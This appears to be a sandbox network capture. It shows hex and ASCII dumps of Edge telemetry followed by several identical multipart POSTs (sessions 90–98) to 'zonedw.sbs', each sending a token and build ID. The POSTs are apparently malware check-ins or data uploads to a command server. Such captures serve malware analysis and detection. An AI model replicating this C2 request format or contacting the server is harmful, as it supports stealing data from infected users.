Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 13 Dec 2024 17:58:55 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.7	50366	51.132.193.105	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:56 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734119262630&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5264 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=27D5836E84FB6FA100DF963A85896E2B; _EDGE_S=F=1&SID=189B3437E698653C251B2163E7526413; _EDGE_V=1; msnup=
2024-12-13 17:58:56 UTC	5264	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 33 54 31 39 3a 34 37 3a 34 32 2e 36 32 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 31 34 64 33 61 66 32 2d 37 63 64 37 2d 34 38 64 63 2d 39 63 32 31 2d 66 35 31 30 38 66 36 31 63 38 31 63 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 33 36 37 39 30 32 31 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-13T19:47:42.629Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"414d3af2-7cd7-48dc-9c21-f5108f61c81c","epoch":"1436790217"},"app":{"locale
2024-12-13 17:58:56 UTC	894	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=afc6bbaf9d004f19b28b6599a7332148&HASH=afc6&LV=202412&V=4&LU=1734112736309; Domain=.microsoft.com; Expires=Sat, 13 Dec 2025 17:58:56 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=02be606ce8884cc9be6f476598c19886; Domain=.microsoft.com; Expires=Fri, 13 Dec 2024 18:28:56 GMT; Path=/;Secure; SameSite=None time-delta-millis: -6526321 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 13 Dec 2024 17:58:56 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.7	50368	51.132.193.105	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:56 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734119262931&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9678 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=27D5836E84FB6FA100DF963A85896E2B; _EDGE_S=F=1&SID=189B3437E698653C251B2163E7526413; _EDGE_V=1; msnup=
2024-12-13 17:58:56 UTC	9678	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 31 33 54 31 39 3a 34 37 3a 34 32 2e 39 33 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 31 34 64 33 61 66 32 2d 37 63 64 37 2d 34 38 64 63 2d 39 63 32 31 2d 66 35 31 30 38 66 36 31 63 38 31 63 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 33 36 37 39 30 32 31 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-13T19:47:42.930Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"414d3af2-7cd7-48dc-9c21-f5108f61c81c","epoch":"1436790217"},"app":{"loc
2024-12-13 17:58:56 UTC	894	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=8f8ad479ef014282b5f2d9b56282cde3&HASH=8f8a&LV=202412&V=4&LU=1734112736533; Domain=.microsoft.com; Expires=Sat, 13 Dec 2025 17:58:56 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=04ddcd3ee20e4520921e1683f3ddf817; Domain=.microsoft.com; Expires=Fri, 13 Dec 2024 18:28:56 GMT; Path=/;Secure; SameSite=None time-delta-millis: -6526398 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Fri, 13 Dec 2024 17:58:56 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.7	50372	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:57 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----SJW4W4OHLXBIEU3EUA1V User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:57 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 Data Ascii: ------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------SJW4W4OHLXBIEU3EUA1VCont
2024-12-13 17:58:58 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:58 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.7	50374	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:58:58 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----R90RQ9HL6P8YU3ECJMOP User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:58:58 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 52 39 30 52 51 39 48 4c 36 50 38 59 55 33 45 43 4a 4d 4f 50 0d 0a 43 6f 6e 74 Data Ascii: ------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------R90RQ9HL6P8YU3ECJMOPCont
2024-12-13 17:58:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:58:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.7	50377	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:59:00 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DTRQIEUAAI58YUAIWTJM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1837 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:59:00 UTC	1837	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 54 52 51 49 45 55 41 41 49 35 38 59 55 41 49 57 54 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 44 54 52 51 49 45 55 41 41 49 35 38 59 55 41 49 57 54 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 44 54 52 51 49 45 55 41 41 49 35 38 59 55 41 49 57 54 4a 4d 0d 0a 43 6f 6e 74 Data Ascii: ------DTRQIEUAAI58YUAIWTJMContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------DTRQIEUAAI58YUAIWTJMContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------DTRQIEUAAI58YUAIWTJMCont
2024-12-13 17:59:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:59:01 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.7	50379	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:59:01 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----UAS0ZU3EUA1NYMY58GLX User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1825 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:59:01 UTC	1825	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 30 5a 55 33 45 55 41 31 4e 59 4d 59 35 38 47 4c 58 0d 0a 43 6f 6e 74 Data Ascii: ------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------UAS0ZU3EUA1NYMY58GLXContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------UAS0ZU3EUA1NYMY58GLXCont
2024-12-13 17:59:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:59:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.7	50386	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:59:03 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IMY5PH47QQ9ZM79H47QQ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:59:03 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 4d 59 35 50 48 34 37 51 51 39 5a 4d 37 39 48 34 37 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 59 35 50 48 34 37 51 51 39 5a 4d 37 39 48 34 37 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 59 35 50 48 34 37 51 51 39 5a 4d 37 39 48 34 37 51 51 0d 0a 43 6f 6e 74 Data Ascii: ------IMY5PH47QQ9ZM79H47QQContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------IMY5PH47QQ9ZM79H47QQContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------IMY5PH47QQ9ZM79H47QQCont
2024-12-13 17:59:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:59:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:59:04 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.7	50389	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:59:04 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----5XBAAI5F3EKNYMGD2N7G User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:59:04 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 58 42 41 41 49 35 46 33 45 4b 4e 59 4d 47 44 32 4e 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 35 58 42 41 41 49 35 46 33 45 4b 4e 59 4d 47 44 32 4e 37 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 35 58 42 41 41 49 35 46 33 45 4b 4e 59 4d 47 44 32 4e 37 47 0d 0a 43 6f 6e 74 Data Ascii: ------5XBAAI5F3EKNYMGD2N7GContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------5XBAAI5F3EKNYMGD2N7GContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------5XBAAI5F3EKNYMGD2N7GCont
2024-12-13 17:59:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:59:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:59:05 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.7	50393	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:59:06 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----XT0RIWTJM7GV3E3OPZU3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:59:06 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 58 54 30 52 49 57 54 4a 4d 37 47 56 33 45 33 4f 50 5a 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 58 54 30 52 49 57 54 4a 4d 37 47 56 33 45 33 4f 50 5a 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 58 54 30 52 49 57 54 4a 4d 37 47 56 33 45 33 4f 50 5a 55 33 0d 0a 43 6f 6e 74 Data Ascii: ------XT0RIWTJM7GV3E3OPZU3Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------XT0RIWTJM7GV3E3OPZU3Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------XT0RIWTJM7GV3E3OPZU3Cont
2024-12-13 17:59:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:59:07 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.7	50396	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:59:07 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OZCB16PZUA1N7YMYCJWB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 1817 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:59:07 UTC	1817	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 36 50 5a 55 41 31 4e 37 59 4d 59 43 4a 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 36 50 5a 55 41 31 4e 37 59 4d 59 43 4a 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 5a 43 42 31 36 50 5a 55 41 31 4e 37 59 4d 59 43 4a 57 42 0d 0a 43 6f 6e 74 Data Ascii: ------OZCB16PZUA1N7YMYCJWBContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------OZCB16PZUA1N7YMYCJWBContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------OZCB16PZUA1N7YMYCJWBCont
2024-12-13 17:59:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:59:08 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.7	50398	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:59:09 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IW479RIW47G4E3W4EU37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:59:09 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 57 34 37 39 52 49 57 34 37 47 34 45 33 57 34 45 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 49 57 34 37 39 52 49 57 34 37 47 34 45 33 57 34 45 55 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 57 34 37 39 52 49 57 34 37 47 34 45 33 57 34 45 55 33 37 0d 0a 43 6f 6e 74 Data Ascii: ------IW479RIW47G4E3W4EU37Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------IW479RIW47G4E3W4EU37Content-Disposition: form-data; 